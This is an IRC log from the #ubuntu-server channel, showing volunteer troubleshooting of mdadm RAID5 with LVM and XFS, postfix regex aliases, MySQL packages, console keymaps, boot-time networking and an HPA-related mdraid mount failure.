<RoyK> when that one drive dies
<RoyK> and it will
<Slugs_> yeah
<Slugs_> ok
<Slugs_> what do i do with the 4th disk though?
<jrwren> Slugs_: alternatively, you can test it both ways and measure for your specific application and use which works best for you.
<Slugs_> yeah makes sense
<RoyK> Slugs_: just use a single drive, even a thumb drive, for the root
<RoyK> Slugs_: then use the 4TB things in raid5
<Slugs_> yeah i have 1 500 gb for root
<Slugs_> and 4, 4TB drives for data
<RoyK> nice
<RoyK> Slugs_: then create a raid5 on those
<RoyK> Slugs_: you can change to raid0 later if you want
<jrwren> Slugs_: so your 1 500GB is /dev/sde ?
<Slugs_> ok so i can do raid5 on 4 disks then
<Slugs_> jrwren: yes exactly
<RoyK> Slugs_: just use raid5 on those, directly on the disks
<RoyK> Slugs_: no partitions needed
<jrwren> Slugs_: good. just making sure it isn't sda. :)
<Slugs_> how did you know thaT?
<RoyK> lsscsi?
<RoyK> jrwren: it doesn't matter if it it's called sda or not
<jrwren> RoyK: it would matter if the 500GB disk is sda, and he just ran mdadm passing sda1 as a partition to use.
<RoyK> jrwren: it wouldn't work
<jrwren> Slugs_: good luck.
<jrwren> RoyK: exactly. and Slugs_ said, 'this command doesn't work"
<jrwren> specifically /dev/sda1 in use.
<RoyK> Slugs_: pastebin lsscsi or output of /proc/partitions, please
<RoyK> or both
<RoyK> or output of lsblk
<Slugs_> ok
<Slugs_> i just deleted the parttions thoughâ¦ one sec
<Slugs_> http://pastebin.com/bT6faShV
<RoyK> ok, sde is the root?
<Slugs_> yes it has the OS on it
<Slugs_> http://pastebin.com/4R5w304i
<Slugs_> here is the output of lsblk
<RoyK> then mdadm --create --level=5 --raid-devices=4 /dev/md0 /dev/sd{a..d}
<Slugs_> i donât have lsscsi
<RoyK> no need
<RoyK> you can install it later
<Slugs_> mdadm: cannot open /dev/sda: Device or resource busy
<Slugs_> oh wait i did have this error
<Slugs_> one sec
<RoyK> what does mount say?
<RoyK> is sda1 mounted?
<Slugs_> not in df -h
<jrwren> Slugs_: i noticed the openstack vg name. are you going to run swift on that storage?
<Slugs_> is there another way to tell?
<Slugs_> jrwren: id like to use it as blockstorage yes
<Slugs_> cinder
<jrwren> Slugs_: swift backed cinder?
<RoyK> Slugs_: raid0 for blockstorage?
<RoyK> you must be insane
<Slugs_> i was testing out speed, it wasnât a final configuration
<Slugs_> just testing
<Slugs_> not planning on using itâ¦
<jrwren> Slugs_: i'll assume it is not production and not call you names :)
<Slugs_> ;)
<Slugs_> thanks
<RoyK> what does /proc/mdstat have to say?
<RoyK> or pvs
<Slugs_> Personalities :
<Slugs_> unused devices: <none>
<Slugs_>   PV         VG           Fmt  Attr PSize   PFree
<Slugs_>   /dev/sde5  openstack-vg lvm2 a--  465.52g 52.00m
<RoyK> ok
<RoyK> can fdisk access /dev/sda?
<Slugs_> yes
<RoyK> and delete that partition?
<Slugs_> WARNING: Re-reading the partition table failed with error 25: Inappropriate ioctl for device.
<Slugs_> The kernel still uses the old table. The new table will be used at
<Slugs_> the next reboot or after you run partprobe(8) or kpartx(8)
<Slugs_> then i ran partprobe
<Slugs_> didnât give any errors, but i guess something is still confused
<RoyK> remove the partition and reboot
<Slugs_> ok
<Slugs_> rebooting ....
<RoyK> ...
<Slugs_> itâs back up
<Slugs_> oh boy
<RoyK> pastebin lsblk again
<Slugs_> ok
<RoyK> or did mdadm --create work?
<Slugs_> http://pastebin.com/aECe1zwt
<Slugs_> no the drive names changed
<Slugs_> good thing i didnât just run it
<Slugs_> well like you said it might not have letme
<Slugs_> let me*
<RoyK> ok, so mdadm --create /dev/md0 --raid-devices=4 --level=5 /dev/sd{b..e}
<RoyK> dev names change
<RoyK> md uses UUIDs to determine which drives are what
<Slugs_> it worked
<RoyK> then vgcreate
<RoyK> and lvcreate
<RoyK> and put a filesystem on top of the lv
<Slugs_> the guide said , assemble
<Slugs_> soâ¦ this is diff
 * Slugs_ is looking up vgcreate and lvcreate
<RoyK> assemble is what you do when things mess up
<Slugs_> i see
<RoyK> apt-get install lvm2
<RoyK> but that's probably installed already
<RoyK> pvcreate /dev/md0
<Slugs_> it is
<RoyK> vgcreate mysuperdata /dev/md0
<RoyK> lvcreate -l 100%FREE veryimportantdata mysuperdata
<RoyK> or something about that
<jrwren> Slugs_: what guide?
<Slugs_> one that sucks i guess
<Slugs_> https://help.ubuntu.com/community/Installation/SoftwareRAID
<RoyK> Slugs_: did you create the pv or vg?
<Slugs_> yes RoyK just working on the lvcreate and seeing what that did
<RoyK> it creates a logical volume
<jrwren> Slugs_: server guide has this: https://help.ubuntu.com/lts/serverguide/advanced-installation.html  for future reference
<RoyK> one you need for putting a fs on
<Slugs_> ok
<Slugs_> jrwren: thank you
<RoyK> so after creating the lv
<RoyK> what did you name it? what did you name the vg?
<Slugs_> vg = data
<Slugs_> whatâs the veryimportantdata part?
<RoyK> just a name
<Slugs_> descrioption/?
<Slugs_> ok
<RoyK> you can rename it or remove it
<Slugs_> hmm
<Slugs_> root@openstack:/home/openstack# lvcreate -l 100%FREE /dev/md0 data
<RoyK> lvs
<Slugs_> ?
<Slugs_>   Volume group "md0" not found
<RoyK> if you didn't give it a name, it'll be named automatically
<RoyK> erm
<Slugs_> oh i see
<Slugs_>   Logical volume "lvol0" created
<RoyK> lvcreate -n myname -l 100%FREE data
<Slugs_>   lvol0  data         -wi-a----  10.92t
<Slugs_> i can rename it then,,, ok
<RoyK> lvrename
<Slugs_> whatâs the path for the logical volume
<Slugs_> root@openstack:/home/openstack# lvrename lvol0 UMS
<Slugs_>   Path required for Logical Volume "lvol0"
<RoyK> Slugs_: from the manual        lvrename /dev/vg02/lvold vg02/lvnew
<Slugs_> ok got it
<Slugs_> now i guess all i need is a filesystem on it?
<RoyK> then put a filesystem on it
<RoyK> I'd suggest xfs for most use
<RoyK> ext4 isn't too good on large things
<RoyK> I spent eight hours waiting for a 8TB ext4 filesystem doing fsck two days back
<Slugs_> mkfs.xfs /dev/mapper/data-lvol0
<Slugs_> oh my
<RoyK> mhm
<Slugs_> ok
<RoyK> then add to /etc/fstab
<RoyK> mount -a
<RoyK> the normal things
<Slugs_> ive seen so many different posts on what to put in your fstab file
<qman__> I personally have misgivings about xfs but I admit it's from anecdotal experiences
<RoyK> Slugs_: /dev/mapper/data-lvol0 /mountpoint xfs defaults 0 0
<RoyK> qman__: probably anectdotal
<ianorlyn> I think the unable to shrink it makes it not be defualt for lots of desktop but not really sure why most servers you would want to shrink a partition that much
<ianorlyn> although sparse files is  a nice feature
<qman__> I've lost data several times with xfs, never with ext3 or ext4
<RoyK> ianorlyn: most filesystems won't be shrunk
<Slugs_> RoyK: is mount -a supposed to just automuont this new fs?
<RoyK> Slugs_: yes
<sarnold> the only filesystem I've seen shrink was FAT, via the fips tool. scary as hell.
<Slugs_> nothing appears to happen when i type df, or is it not suppoosed to show up there/
<RoyK> Slugs_: but that data-lvol0 may be different when you changed the name of the lv
<Slugs_> im not going to bother changing it
<jrwren> how is the sparse files feature different in xfs v. ext4?
<RoyK> Slugs_: pastebin lvs
<RoyK> jrwren: hardly
<Slugs_> http://pastebin.com/eFjJA9zy
<jrwren> i've shrunk ext4 many times. it works nicely.
<sarnold> jrwren: that's even scarier :)
<RoyK> Slugs_: so /dev/data/lvol0 /data xfs defaults 0 0
<Slugs_> ok
<qman__> I've also run into the problem with xfs where you can't add any more files even though there's more space because the first block thing is full
<RoyK> Slugs_: just create /data first
<qman__> I forget what it's called
<jrwren> sarnold: i should have been more scared than I was. i shrunk without backup! ;]
<sarnold> jrwren: brave brave brave :) hehe
<RoyK> qman__: I have this neat 25TB filesystem on xfs - works well
<qman__> I've shrunk ext file systems without problems too
<Slugs_> RoyK: Thank you!
<RoyK> Slugs_: ;)
<Slugs_> 11 TB
<ianorlyn> although the man pages for xfsprogs and e2fsprogs contain some nice looking options
<qman__> RoyK: this was a 110tb fs that was expanded
<RoyK> qman__: oops
<qman__> Yeah, customer made some unwise choices, nothing I could do by the time I got to it
<RoyK> qman__: a restore from tape to that would take some time
<jrwren> sarnold: i'm too stupid to be brave :)   truthful, its my data, I considered the risk of doing it with backup and not, and made a decision
<qman__> They let it fill 100% then expanded
<RoyK> Slugs_: does it work?
<ianorlyn> worst backup solution ever raid 0 tape drives
<Slugs_> RoyK: yes
<Slugs_> I guess itâs initializing or something
<Slugs_> i did /proc/mdstat
<Slugs_> and it appears to be initializing i guess
<RoyK> Slugs_: give it a reboot to see if it's coming up correctly
<Slugs_>       [>....................]  recovery =  4.2% (167079192/3906887168) finish=491.0min speed=126940K/sec
<Slugs_> what about this...
<RoyK> Slugs_: it needs to initiate the raid
<RoyK> or initialise
<Slugs_> should i reboot now or wait
<RoyK> wait
<Slugs_> ok
<qman__> Makes no difference really
<qman__> If you reboot it will resume
<Slugs_> oh, not start over?
<RoyK> qman__: does ubuntu boot with degraded now?
<Slugs_> i read a post it did
<qman__> Oh, that might be a headache, forgot about that
<RoyK> Slugs_: dpkg-reconfigure mdraid
<RoyK> Slugs_: and choose boot degraded
<Slugs_> itâs not a boot drive though, is that ok?
<RoyK> Slugs_: some idiots have chosen ubuntu not to boot with degraded raid
<RoyK> that's what raid is for for fscks sake
<Slugs_> wow, so if your raid becomes degradedâ¦â¦. you canât boot of your non raid boot drive?
<Slugs_> off*
<qman__> Because it's "safer" for those who don't monitor their systems
<RoyK> qman__: heh
<qman__> Forces them to fix it rather than let it die
<RoyK> qman__: doesn't make sense
<Slugs_> am i right and what your saying?
<qman__> Yeah, I don't agree with it either, but that's the reasoning
<RoyK> qman__: a system that lets you do an rm -f anywhere and not letting the system boot without a drive in a raid?
<qman__> I also don't agree with grub halting on failure to boot
<qman__> Causing lots of annoying unnecessary dispatches that
<RoyK> Slugs_: just reconfigure that and try a reboot
<Slugs_> http://pastebin.com/EwqXCWMB
<RoyK> Slugs_: it'll show how well the system works with a failed drive
<qman__> The power flickering a couple times shouldn't stop the system from booting when it comes back
<RoyK> Slugs_: that's the data storage, not your boot device
<Slugs_> ok
<RoyK> Slugs_:
<Slugs_> ok rebooting
<Slugs_> down...
<RoyK> damn - home server went down :(
<Slugs_> back up RoyK
<Slugs_> df -h
<Slugs_> looks like it picked up where it left off
<Slugs_> so if i wouldnt have installed dmraid, and a drive when down i would not be able to boot/>
<Slugs_> ?
<Slugs_> i have to write all this down...
<qman__> I use partitions not only because of the boot feature, but also to prevent data loss in the event of a misguided partitioning tool or grub install, and also because I've run into instances where one type of hard drive is just slightly larger or smaller than another
<qman__> A 2mb buffer can save you when the replacement disk you bought is a block smaller than the one it's replacing
<qman__> It also makes it apparent what's on the disk in a recovery scenario
<th3s3_3y3s> Where is the module block list. Looks like I disabled blutooth due to an ipv6 network runnung by default.
<th3s3_3y3s> Ruben
<th3s3_3y3s> Do you want to install man in eden folder?
<th3s3_3y3s> Enough shah on me yet?
<th3s3_3y3s> What is the lady in red for?
<th3s3_3y3s> Is there a different rib?
<th3s3_3y3s> The pabdora network U disabled.
<th3s3_3y3s> Youns need to plug into my skynet.
<th3s3_3y3s> Usb has a 30 ft radius. This is red security zone.
<th3s3_3y3s> So far looking bad.
<th3s3_3y3s> Send chopper to pick up man and install man in a 30 ft shielded room.
<th3s3_3y3s> Usb bluetooth has been causing a priblem.
<th3s3_3y3s> Its been shooting out signals.
#ubuntu-server 2015-09-26
<sexywoodenspoon> TJ-: hey
<TJ-> sexywoodenspoon: why are you concerned about the processing order?
<sexywoodenspoon> TJ-: Didn't notice you were already here sorry
<sexywoodenspoon> Yeah, I've got rules (see this: http://pastebin.com/7AF12jSC) as my alias maps
<sexywoodenspoon> If I send to abc@example2.example.org I expect it to go to forward@gmail.com and not forward2@gmail.com
<sexywoodenspoon> Reordering doesn't change a damn thing so I'm assuming the regex pattern is over-riding it somehow
<sexywoodenspoon> Expected functionality is: if a subdomain is listed, forward to a specific address (might change each time), if the subdomain isn't explicitly named - forward to another address - catchall style.
<TJ-> It's a long time since I needed to configure postfix that way; but I seem to recall 'last matching rule, wins'
<sexywoodenspoon> Yeah tried both ways (with the explictly named one last) and it still went to forward2@gmail (as per my example)
<sexywoodenspoon> Actually that's how I started and decided to change it to see if it was first rule matches but nup
<TJ-> I remembered wrong; it's first wins
<sexywoodenspoon> Hmmm in that case my first example should work but it hasn't... odd
<sexywoodenspoon> FYI the pastebin, the newline between the two groups is the two alias maps I tried
<sexywoodenspoon> Weird... I'm getting an error: warning: pcre map /etc/postfix/virtual, line 1: unknown regexp option "o": skipping this rule
<sexywoodenspoon> shit!
<sexywoodenspoon> hang on, they should *all* be regex patterns?
<TJ-> That's what 'man 1 virtual' indicates
<sexywoodenspoon> TJ-: I got that bit of RTFM ;)
<sexywoodenspoon> TJ-: Sorry man, been staring at this so long it started to become the biggest task on the planet
<sexywoodenspoon> Well, here goes
<sexywoodenspoon> TJ-: I could kiss you right now, but you wouldn't appreciate that
<sexywoodenspoon> Thanks man
<sexywoodenspoon> and thanks man
<TJ-> "man 5 regexp_table"  ... "postmap -q - regexp:/etc/postfix/filename < ... "
<TJ-> "regexp:" is a protocol/type indicator
<sexywoodenspoon> Question answered. First rule match = win, every map must be a regex /@example.example.org/
<sexywoodenspoon> Fantastic
<TJ-> easy :)
<sexywoodenspoon> TJ-: When you haven't had the day from hell, yeah! Should have been a two minute bit of fun but nup!
<TJ-> I'm still having it! Snowed under and going backwards under an avalanche of 15.10 bugs
<sexywoodenspoon> TJ-: to get you through: https://www.reddit.com/r/sysadmin/comments/20zg6j/sysadmin_of_4chan/
<neurotus> whats the name of package that chekcks after apt-get upgrade that no processes are using old files ?
<bekks> afaik apt-get is doing that.
<neurotus> bekks: the package is needrestart
<bekks> ah, TIL, thx :)
<neurotus> bekks: found it from other systems alias definitions
<neurotus> handy to put after apt-get upgrade in a system-update-alias
<ren0v0> hi, it seems mysql-server-5.6 doesn't install, (or isn't for me), on ubuntu 14.04. I'm getting a similar bug to this, but i have 4GB of ram free  >  http://askubuntu.com/questions/457923/why-did-installation-of-mysql-5-6-on-ubuntu-14-04-fail
<bekks> ren0v0: And whatd the exact output you get?
<ren0v0> bekks, i've borked the VM trying to remove it, i managed to fix this error with installing "bsdutils", but then another PPA wanted "mysql-server" installed, and this is a metapackage that links to 5.5, what am i supposed to do about that ?
<ren0v0> i have some broken packages  "pB" in dpkg output, how do i remove them?
<bekks> So you are using PPA which provide mysql-server then?
<ren0v0> hmm i guess so
<ren0v0> not sure how to tell that
<ren0v0> add-apt-repository ppa:iconnor/zoneminder
<bekks> apt-cache policy mysql-server
<ren0v0> i can't get 5.6 uninstalled.... dpkg shows pB
<ren0v0> everytime i try and install 5.5 it errors
<bekks> So pastebin the errors.
<ren0v0> ok let me try again, i've removed all mysql named files on the box
<bekks> Thats a good way to break things.
<ren0v0> fixed it
<ren0v0> no
<ren0v0> mysql-common i tink was the issue, remaining files in /etc/mysql etc
<ren0v0> no errors this time around so hopefully thats it
<lordievader> Good morning.
<denbeiren> mornin
<parapan> hi all have some troubles with 14.04 LTS ..
<lordievader> What troubles?
<parapan> installation stucked at select and install software ...it tells me an error has occured; I moved on to the next step which is grub install ..it tells me that grub cannot be installed
<lordievader> What error did it gave exacatly?
<parapan> an installation step failed.
<parapan> you can try installing the failing item again from the menu or you can skip ....and so on . . .
<lordievader> So what is it failing on? Updates?
<parapan> the failing step is: select and install software
<lordievader> Right, what did you select?
<parapan> seems so ....it;s telling me running updates 1 up to 5% ,,,and then this error ...
<parapan> everything
<lordievader> Everything? Does it install when you select nothing?
<parapan> all additional software DHCP and mail servers, php 5, all ...
<parapan> didn't tried .....after the basic core of the server it presented to 5-6 options of different packages ...installed 600 and something .....not installed 1000+ ...and another 4 options .....
<parapan> I've selected that 1000+ packages .....pressed "g" 2 times .....begin the installation .......and after that it reverted to the same screen with those 6 options ....
<lordievader> So try it ;)
<parapan> where the not installed packages are now around 600 units ....but after that I cannot move the process forward ....I am stucked on the Menu ....
<parapan> ok, then reboot again and so on and I select only the core of the server, no additional packages correct ?
<lordievader> Yes, install the rest later.
<parapan> lordievader: restarter, select to boot from USB it says ...network boot not available continuing with normal boot sequence ...
<parapan> and it;s stucked here
<lordievader> Now I am confused. What are you booting?
<parapan> the machine again ..
<lordievader> The installer?
<parapan> I had to shut power off on the machine ..probably something was in the way of rebooting from USB disk
<parapan> now it;s working the re-install started ...
<parapan> lordievader: so next time i select nothing ? no mail server, no php, no nothing correct ? just the core of the server ...
<lordievader> parapan: Correct.
<parapan> lordievader: I'll keep you informed on the status ...pls don't leave :D
<parapan> lordievader: passed the software selection for install...selected nothing and than CONTINUE ...now is downloading 181 packages
<parapan> lordievader: worked like a charm with no other software install options
<parapan> now I'm upgrading the packages ..
<parapan> it seems to go on the right way ...
<lordievader> Good to hear.
<parapan> finished. good to have support mates !
<parapan> ;)
<parapan> can somebody remember ? I once encountered a simple command to make the current folder shared via webserver ....
<Guest51163> I am wondering without X11 and down loading any packages in a linux operating system or unix like os what is the builtin commands to remap keyboard keys and remap mouse buttons
<bekks> Depends on the exact OS.
<Guest51163> remember the terminal doesn't necessarily have to be a bash , csh , ksh ,...etc terminal i want the most general way that most unix or linux os's can do it with no-X11 ,graphical enviorment or any add-on downloaded packages or tar file programs... there should be a general way to do this after all keyboards and mouses have been around since the begining of time
<Guest51163> there should be a built in way normally to do this ?
<bekks> There is no such general way.
<bekks> Specify the OS, then there is a way maybe.
<ogra_> on ubuntu you would do: sudo dpkg-reconfigure keyboard-configuration
<ogra_> (i guess on debian as well)
<ogra_> for mice there is http://packages.ubuntu.com/trusty/gpm ... I havent used that in a decade, so i'm not sure it still works
<bekks> ogra_: for mice on Ubuntu / Linux, respectively. On Unix systems, there isnt gpm.
<ogra_> sure ... just talking about ubuntu here
<ogra_> (i dot even know if gpm still exists in other distros ... and dpkg-reconfigure definitely wont on non dpkg distros)
<ogra_> there is definitely no general way
<Guest51163> so under say a bash , csh , ksh terminal is there a general way to do it then or at boot up with grub to tell it to remap the keys so that you can actually type correctly
<bekks> Guest51163: The answer still is no.
<Guest51163> under bash then would you uses commands like loadkeys and others see i would have thought there was some kind of standard ls /bin | grep "key" type functions built in to all unix / linux type os's bin files or sbin files but maybe i am wrong... though with x11 graphical enviorment it is pretty universal
<Guest51163> but without a graphics enviorment your telling me there is no standard way hummm i don't think i agree i will have to look into later thanks anyway
<bekks> Even for a graphical environment, there isnt a general way. But it seems thats not the answer you want to hear.
<ogra_> the shell has no influence on the keyboard mapping btw ... that happens on a lower level
<TJ-> !info console-setup | Guest51163
<ubottu> Guest51163: console-setup (source: console-setup): console font and keymap setup program. In component main, is important. Version 1.108ubuntu5 (vivid), package size 126 kB, installed size 475 kB
<ogra_> TJ-, hmm, i dont think thats accurate anymore ... console-setup only sets the locale and font nowadays keymaps are set using keyboard-setup
<ogra_> someone needs to fix the package description to mtch reality i guess :)
<TJ-> ogra_: I was about to type that one but got side-tracked locally
<TJ-> !info keyboard-configuration
<ubottu> keyboard-configuration (source: console-setup): system-wide keyboard preferences. In component main, is important. Version 1.108ubuntu5 (vivid), package size 745 kB, installed size 2588 kB
<ogra_> yeah
<TJ-> I was trying to check when it took over from console-setup, because locally I'm on 15.10
<ogra_> i think that was around 12.04 already ...
<ogra_> definitely quite a while ago
<TJ-> How time flies :)
<ogra_> :)
<TJ-> Today I've just had to re-fix a bug I fixed in 2009... took me an hour before I realised I'd been here before :)
<ogra_> heh
<TJ-> Would you happen to know who's active in the CD Image team; I need to persuade them to use an alternate MBR for hybrid ISO images
<Guest51163> thanks for that i will have to look more into loadkeys and other commands to translate keys /tables... curious is there away with these commands to completely map your keyboard to unicode character set or some different action completely so that once can make a general language with his keyboard
<Guest51163> And also curious when installing the os's and your allowed to select the keyboard language/type which is this doing interms of manually doing the equivalent is there some files with all the tables that one can loadkeys manually to switch keyboard layout/lanuages on the fly?
 * bekks is wondering about the actual issue behind all those weirdness.
<Guest51163> I mean doing these settings for clock and timezone by hand after the os has been install is straight forward thru command line . so it stands to reason keyboard settings and mouse settings that the os's configures at install time can be changed as easy as the clock/timezone things
<ogra_> the ubuntu installer calls the same "dpkg-reconfigure keyboard-configuration" you call when changing it
<ogra_> ... like it calls dpkg-reconfigure tzdata ... which you would use to re-configure the timezone on an ubuntu system
<Guest51163> yes but that is for ubuntu or os's that uses dpkg package manager was kind of hoping for a general way to do all linux branches redhat , slackware as well as the debian solution  you gave me
<Guest51163> Also for the BSD flavors like open,net , dragon fly , free,...etc
<Guest51163> basically is dpkg-reconfigure calling some program which uses loadkeys with some file for the tables that are located somewhere i am not aware of on the os
<ogra_> well, even if these OSes would use the same files and configs to set the stuff you want, there is most likely in each of them something on top to manage the configuration ... in case of ubuntu all your selections from dpkg-reconfigure are stored in the debconf db ... in case of SuSE you likely have some yast db and so on ..
<ogra_> if you modify the config underneath them without updating thir respective tools as well things will likely get reverted or break
<Guest51163> ok got you but back in the day before package managers i.e the tar  or archive only days there most have been some unverisal or common way to go about remapping keys and configuring your mouse/keyboard buttons for a certain language/type
<ogra_> you mean like 30 years ago ?
<ogra_> well ... 20 rather
<Guest51163> Obviously when package managers came out you just have to find the package manager setting to and the keyboard install program to reconfigure those setting similar to redoing the os's installation but for just those settings
<ogra_> right, and these things even evolved over the 20 years that for exampe dpkg exists
<ogra_> aand added more complexity on top
<ogra_> so whatever you do on a low level will likely cause something to go out of sync
<Guest51163> I get how its done now adays more package manager and program specific but back in the day  it must be mostly a bash,csh,ksh terminal command to do this that was built in and was hopeing still left there but depreciated
<ogra_> i even doubt it is deprecated ... there is surely loadkeys or something like that used on a low level
<Guest51163> I understand it could screw things up at higher levels but want to understand it completely from the evolution of it to now obviously know it is just relatively simple but back then you had more control over it or seems a better understanding of the exact thing not just layer up above it interfering with your understanding
<Guest51163> yes but how with loadkeys can one switch languages/types all together ?
<ogra_> like you can use setxkbmap under X11 ... but nothing will guarantee you that the desktop you use wont unset your setting because it manages keymaps differently on a high level
<Guest51163> As one choses when installing an os's
<Guest51163> No gui
<ogra_> that was an analogy
<Guest51163> ok i guess i have to research later thanks though
<ogra_> some these desktops most likely even use setxkbmap for their management ... but perhaps they use a different DB on top etc ... same goes for loadkeys ... most of the config tolls might use it, but if you call it directly they will just revert your setting
<ogra_> so even if you would find the magic builet tool that is usable on all these systems, you would most likely cause breakage here and there by using it
<Guest51163> so how does one with these commands switch from english to japan keyboard say for example
<ogra_> depending on the implementation of the higher level bits
<Guest51163> well for mouse buttons i would imagine these would one be worth much in an X11 enviorment anyway but there is times with ncurser and other things that you would probably uses a mouse so curious if you can configure it in grub or at the bash prompt with no X11 as well
<Guest51163> And what those programs would be for the mouse. Obviously X11 allows one to set it in his xinitrc to do this or call a configuration file for this but that is specific to x11 i am saying no x11 for mouse settings as well
<ogra_> as i said in the beginning, there is the gpm package ... that gets (or got, you have to check if it still works) you a mouse cursor in a tty
<Guest51163> is that normally installed by default
<ogra_> no
<Guest51163> so what is the default built in commands like loadkeys, dumpkeys...etc for the mouse buttons /settings if one doesn't have x11 installed
<Guest51163> man gpm
<ogra_> there are none
<Guest51163> seems like gpm is for virtual consoles and would need x11 ?
<shauno> there really isn't anything built-in for the mouse without X11. (it's doable but nowhere near default/builtin).  so there's no default to manipulate it either
<ogra_> no, gpm is for ttys
<ogra_> it wont work under X
<Guest51163> ncurser doesn't uses x11  startx graphics enviorment
<Guest51163> all i see in man pages is it is a mouse server for a virtual console so seems to be for an x11  server
<ogra_> ??
<Guest51163> though maybe i am wrong
<ogra_> what does a vitual console have to do with X ?
<Guest51163> and the mouse server is an independent server that is not part of X11 to translate mouse cursor movement from the loadable kernel module or builtin mouse driver of the os's
<Guest51163> maybe i am getting mixed up with the terms virtual console and virtual terminal then
<Guest51163> because virtual terminals have to run under x11
<ogra_> yes
<Guest51163> your saying virtual consoles /dev/vcs just are the different ctrl+alt + fn screens
<Guest51163> other then what x11 is running on
<Guest51163> f7
<ogra_> Description-en: General Purpose Mouse interface
<ogra_>  This package provides a daemon that captures mouse events when the system
<ogra_>  console is active, and delivers events to applications through a library.
<ogra_>  .
<ogra_> from apt-cache show gpm
<anternat> i cannot ping my server locally but it is already connected to the internet.What must i do
<T3DY> Best VPN package for ubuntu server?
<bekks> T3DY: There is no single best, since that is just your personal opinion. There are various VPN packages for Ubuntu.
<T3DY> Well could I get some personal opinions then? :P
<ponyofdeath> hi, trying to boot from san. and am being dropped to initramfs after install. any ideas? it says device busy when initramfs tryies to mount the uuid
#ubuntu-server 2015-09-27
<T3DY> Such a dead group
<hallyn> zul: meh, i think my libvirt preinst/postinst bits to handle starting libvirt-guests is wrong altogether.
<hallyn> zul: i think it needs to drop the preinst bit ,and just unconditionally start libvirt-guests.  which also has wrong name for libvirtd service.
<lordievader> Good morning.
<teward> general question: I have a computer upon which I installed Ubuntu Server 14.04.3.  /etc/network/interfaces has `allow-hotplug eth0` and `iface eth0 inet dhcp` in it, but on boot it doesn't get configuration done for the network / IP.  Manual execution of `dhclient` makes it negotiate correctly.
<teward> any ideas of diagnosing?
<lordievader> Check the logs.
<teward> which logs :P
 * teward yawns
<lordievader> dmesg, messages, syslog, etc
<teward> mmmm
<teward> nothing informative in dmesg, syslog.  except that pre-start terminated with status 1, and post-stop terminated with 100
<teward> kernel earlier on also complains it terminated with status 1 twice
<teward> but it doesn't appear informative of any specifics :/
<lordievader> Pre/post start of what?
<lordievader> Networking?
<teward> mhm
 * teward yawns
<teward> sorry, i'm still waking up >.<
<lordievader> Is that a yes?
<teward> yes, it is
<lordievader> teward: There is your problem.
<teward> lordievader: uninformative error codes are uninformative.  any idea where they're documented?
<lordievader> Err, no idea.
<lordievader> Upstart keeps logs though.
<teward> upstart's logs were helpful
<teward> apparently it said invalid option placement.
<teward> looking at the interfaces file, i had to open it in a different editor, but it found rogue ascii
<teward> that answers the problem xD
<teward> (neither nano nor vi nor vim showed the ascii.  hex editor found it ;P)
<TJ-> teward: i usually find 'less' is good for spotting those random control codes, unless using 'less -r'
<teward> ,,,
<teward> mmm*
<teward> yeah, well, meh
<teward> found it, fixed it, problem solved :)
<tgm4883> Trying to mount a hosts directory into an lxc container using the command listed as an example when running lxc config (which is "lxc config device add container1 mntdir disk source=/share/c1 path=opt"). I get no errors on the command line, but nothing in that folder is present when I do an ls from inside the container. Is there something else that needs to
<tgm4883> be done?
<tgm4883> Hmm, apparently it has to be stopped to add it
<hallyn> zul: smb: does http://paste.ubuntu.com/12594504/ make sense to you?
<zul> hallyn: oooks ok to me
<hallyn> zul: does what i'm saying and doing make sense?
<zul> yeah
<hallyn> cool, thanks
<hallyn> i'll push in a bit when i feel more couragious
<Karunamon> hi folks, does anyone in here know anything enough about mdraid to explain why it can't see a mirrored drive from another system?
<lordievader> Karunamon: Have you assembled them?
<patdk-lap> have you put the disks from the other system into this one?
<Karunamon> the one disk, yes
<Karunamon> the other one is toast
<Karunamon> if i do an mdadm -E /dev/sdb1, it sees the drive as part of an array, but the problem i'm having is actually getting the cursed thing mounted
<lordievader> Karunamon: Probably since the other disk is not found it wont assemble it automatically, you have to do that manually.
<Karunamon> an --assemble --scan shows me "/dev/sdb1 has wrong uuid"
<TJ-> Karunamon: does the current system also have md arrays? If so, does the metadata on both have the same device node name (e.g. md0) ?
<Karunamon> TJ-,no other arrays on the system
<Karunamon> hm, there it goes. Apparently an earlier command had dumped a line for a non existent array into mdadm.conf
<Karunamon> cleared that, --assemble --scan, and we're good
<Karunamon> of course now the filesystem does not want to mount
<Karunamon> so it's XFS.. (this much I know from memory), but it can't be mounted because it's trying to read beyond the end of the disk?
<Karunamon> 262144 (sectors? blocks?) beyond the end
<TJ-> Are you sure the original array was only RAID-1 ?
<Karunamon> 100% positive. There were four drives in the old system, two RAID1 sets
<bekks> Two raid1 sets or one raid10 set?
<Karunamon> two raid1 sets (one was for the system, the other was for bulk storage)
<TJ-> Karunamon: OK, it could be a HPA (Host Protected Area) issue I suppose.
<Karunamon> i'm also sure this is the case since I set it up that way because there were two 500g drives and two 250g drives :)
<Karunamon> oh boy.. this got complicated, then
<Karunamon> because the drive is being accessed via a raw device mapping on an esx server connected as a single disk logical device on a HP raid controller >_<
<TJ-> Karunamon: is the raw drive partitioned, or pure MD without a partition table?
<Karunamon> it's partitioned, the first partition is the mdraid device
<TJ-> Karunamon: which metadata version is the MD using (that affects where the metadata is in the underlying partition)
<Karunamon> 1.2
<TJ-> Did the error message about reading beyond end of device come from the kernel log? Can you show the exact message (and any surrounding messages that are relevant) ?
<Karunamon> It did come from the kernel (per syslog), but what's there is pretty scant
<Karunamon> lemme paste it
<Karunamon> https://gist.github.com/4052b9be877070e2a5b7
<Karunamon> the first one was during an attempt to mount, the second was during an xfs_repair attempt
<TJ-> Karunamon: "capacity change from 0 to 499837108224" matches "limit=986244352" (in 512-byte sectors).
<Karunamon> TJ-: so it's mdadm who has the wrong idea as to the size this thing should be
<TJ-> Karunamon: what does "hdparm -N /dev/sdX" report about HPA?
<Karunamon>  max sectors   = 0/1, HPA is enabled
<TJ-> Karunamon: aha, so HPA = yes, but "0/1" ... that's not right!
<Karunamon> there could be some strangeness because of the convoluted way this drive is mounted
<TJ-> Karunamon: is it on a USB controller?
<Karunamon> Worse. So this system is a VM, it's using a raw device mapping in ESXi to access the drive, itself connected to a raid controller as a single disk device
<Karunamon> and before you ask: it's a SAS drive, and I don't have any other gear onhand to read those
<Karunamon> so some quick searching.. this sounds like an automatic HPA unlocking thing that ubuntu had some issues with a while back?
<TJ-> Karunamon: hmmm, can you use hdparm from the host?
<Karunamon> it was unlocked on the previous system, and not here, so the end of the drive is seemingly missing?
<Karunamon> not on the host unfortunately
<TJ-> Karunamon: Yes. There's a trick many sysadmins uses to avoid this. When creating an MD device not allocating all the raw device, to allow HPA to be on/off without a problem. Not much help now of course :)
